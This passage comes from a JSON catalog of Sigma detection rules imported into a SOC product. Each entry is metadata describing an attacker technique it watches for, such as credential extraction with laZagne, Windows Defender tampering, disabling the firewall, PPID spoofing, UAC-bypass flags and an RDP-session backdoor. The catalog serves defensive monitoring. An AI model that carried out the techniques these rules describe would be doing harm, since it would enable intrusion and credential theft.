"name": "Potential Shim Database Persistence via Sdbinst.EXE", "description": "Detects installation of a new shim using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-shim-database-persistence-via-sdbinst-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "517490a7-115a-48c6-8862-1a481504d5a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" } }, { "id": "sigmahq-sigma-51aa9387-1c53-4153-91cc-d73c59ae1ca9", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - System", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml" } }, { "id": "sigmahq-sigma-51ae86a2-e2e1-4097-ad85-c46cb6851de4", "type": "detection", "name": "Renamed PsExec Service Execution", "description": "Detects suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-psexec-service-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml" } }, { "id": "sigmahq-sigma-51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "type": "detection", "name": "Potential Windows Defender Tampering Via Wmic.EXE", "description": "Detects potential tampering with Windows Defender settings, such as adding an exclusion using wmic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-windows-defender-tampering-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml" } }, { "id": "sigmahq-sigma-51e33403-2a37-4d66-a574-1fda1782cc31", "type": 
"detection", "name": "RDP Login from Localhost", "description": "RDP login with localhost source address may be a tunnelled login", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-login-from-localhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "51e33403-2a37-4d66-a574-1fda1782cc31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml" } }, { "id": "sigmahq-sigma-5205613d-2a63-4412-a895-3a2458b587b3", "type": "detection", "name": "Network Connection Initiated By AddinUtil.EXE", "description": "Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\nThis could indicate a potential command and control communication as this tool doesn't usually initiate network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-addinutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5205613d-2a63-4412-a895-3a2458b587b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_addinutil_initiated.yml" } }, { "id": "sigmahq-sigma-52182dfb-afb7-41db-b4bc-5336cb29b464", "type": "detection", "name": "Suspicious File Download From File Sharing Websites - File Stream", "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-websites-file-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" } }, { "id": "sigmahq-sigma-5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "type": "detection", "name": "Bitbucket User Details Export Attempt Detected", "description": "Detects user data export activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213", "T1082", "T1591.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-details-export-attempt-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml" } }, { "id": "sigmahq-sigma-526be59f-a573-4eea-b5f7-f0973207634d", "type": "detection", "name": "New Process Created Via Wmic.EXE", "description": "Detects new process creation using WMIC via the \"process call create\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-process-created-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "526be59f-a573-4eea-b5f7-f0973207634d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml" } }, { "id": "sigmahq-sigma-526cc8bc-1cdc-48ad-8b26-f19bff969cec", "type": "detection", "name": "Removal Of Index Value to Hide Schedule Task - Registry", "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-index-value-to-hide-schedule-task-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml" } }, { "id": "sigmahq-sigma-52753ea4-b3a0-4365-910d-36cff487b789", "type": "detection", "name": "Hijack Legit RDP Session to Move Laterally", "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hijack-legit-rdp-session-to-move-laterally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52753ea4-b3a0-4365-910d-36cff487b789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" } }, { "id": "sigmahq-sigma-52788a70-f1da-40dd-8fbd-73b5865d6568", "type": "detection", "name": "JScript Compiler Execution", "description": "Detects the execution of the \"jsc.exe\" (JScript Compiler).\nAttackers might abuse this in order to compile JScript files on the fly and bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jscript-compiler-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_jsc_execution.yml" } }, { "id": "sigmahq-sigma-52a85084-6989-40c3-8f32-091e12e13f09", "type": "detection", "name": "smbexec.py Service Installation", "description": "Detects the use of the smbexec.py tool by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smbexec-py-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52a85084-6989-40c3-8f32-091e12e13f09", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml" } }, { "id": "sigmahq-sigma-52cad028-0ff0-4854-8f67-d25dfcbc78b4", "type": "detection", "name": "HTML Help HH.EXE Suspicious Child Process", "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001", "T1059.003", "T1059.005", "T1059.007", "T1218", "T1218.001", "T1218.010", "T1218.011", "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/html-help-hh-exe-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" } }, { "id": "sigmahq-sigma-52d097e2-063e-4c9c-8fbb-855c8948d135", "type": "detection", "name": "Suspicious Windows Update Agent Empty Cmdline", "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-windows-update-agent-empty-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml" } }, { "id": "sigmahq-sigma-52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "type": "detection", "name": "First Time Seen Remote Named Pipe", "description": "This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote exec using named pipes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/first-time-seen-remote-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_lm_namedpipe.yml" } }, { "id": "sigmahq-sigma-52ff7941-8211-46f9-84f8-9903efb7077d", "type": "detection", "name": "HackTool - PPID Spoofing SelectMyParent Tool Execution", "description": "Detects the use of parent process ID spoofing tools like Didier Stevens' tool SelectMyParent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-ppid-spoofing-selectmyparent-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "52ff7941-8211-46f9-84f8-9903efb7077d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" } }, { "id": "sigmahq-sigma-53059bc0-1472-438b-956a-7508a94a91f0", "type": "detection", "name": "Disable System Firewall", "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53059bc0-1472-438b-956a-7508a94a91f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml" } }, { "id": "sigmahq-sigma-530a6faa-ff3d-4022-b315-50828e77eef5", "type": "detection", "name": "Anydesk Remote Access Software Service Installation", "description": "Detects the 
installation of the anydesk software service. This could be an indication of anydesk abuse if the software isn't already used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anydesk-remote-access-software-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "530a6faa-ff3d-4022-b315-50828e77eef5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml" } }, { "id": "sigmahq-sigma-53330955-dc52-487f-a3a2-da24dcff99b5", "type": "detection", "name": "New BgInfo.EXE Custom DB Path Registry Configuration", "description": "Detects setting of a new registry database value related to BgInfo configuration. 
Attackers can, for example, set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-db-path-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53330955-dc52-487f-a3a2-da24dcff99b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml" } }, { "id": "sigmahq-sigma-53389db6-ba46-48e3-a94c-e0f2cefe1583", "type": "detection", "name": "MITRE BZAR Indicators for Persistence", "description": "Windows DCE-RPC functions which indicate persistence techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mitre-bzar-indicators-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53389db6-ba46-48e3-a94c-e0f2cefe1583", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" } }, { "id": "sigmahq-sigma-534f2ef7-e8a2-4433-816d-c91bccde289b", "type": "detection", "name": "Explorer NOUACCHECK Flag", "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/explorer-nouaccheck-flag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml" } 
}, { "id": "sigmahq-sigma-536e2947-3729-478c-9903-745aaffe60d2", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific - ProcessCreation", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "536e2947-3729-478c-9903-745aaffe60d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml" } }, { "id": "sigmahq-sigma-53821412-17b0-4147-ade0-14faae67d54b", "type": "detection", "name": "System Integrity Protection (SIP) Enumeration", "description": "Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. 
This technique is used in post-exploit scenarios.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-integrity-protection-sip-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53821412-17b0-4147-ade0-14faae67d54b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" } }, { "id": "sigmahq-sigma-5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "type": "detection", "name": "Suspicious Execution Location Of Wermgr.EXE", "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-location-of-wermgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" } }, { "id": "sigmahq-sigma-53acd925-2003-440d-a1f3-71a5253fe237", "type": 
"detection", "name": "Anonymous IP Address", "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anonymous-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53acd925-2003-440d-a1f3-71a5253fe237", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml" } }, { "id": "sigmahq-sigma-53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "type": "detection", "name": "Password Change on Directory Service Restore Mode (DSRM) Account", "description": "Detects potential attempts made to set the Directory Services Restore Mode administrator password.\nThe Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\nAttackers may change the password in order to obtain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-change-on-directory-service-restore-mode-dsrm-account.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" } }, { "id": "sigmahq-sigma-53b1b378-9b06-4992-b972-dde6e423d2b4", "type": "detection", "name": "Credentials In Files", "description": "Detecting attempts to extract passwords with grep and laZagne", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credentials-in-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53b1b378-9b06-4992-b972-dde6e423d2b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" } }, { "id": "sigmahq-sigma-53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "type": "detection", "name": "Potential MFA Bypass Using Legacy Client Authentication", "description": "Detects successful authentication from potential clients using legacy authentication via user agent strings. 
This could be a sign of MFA bypass using a password spray attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mfa-bypass-using-legacy-client-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml" } }, { "id": "sigmahq-sigma-53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "type": "detection", "name": "COM Object Execution via Xwizard.EXE", "description": "Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\nThis utility can be abused in order to run custom COM object created in the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-object-execution-via-xwizard-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
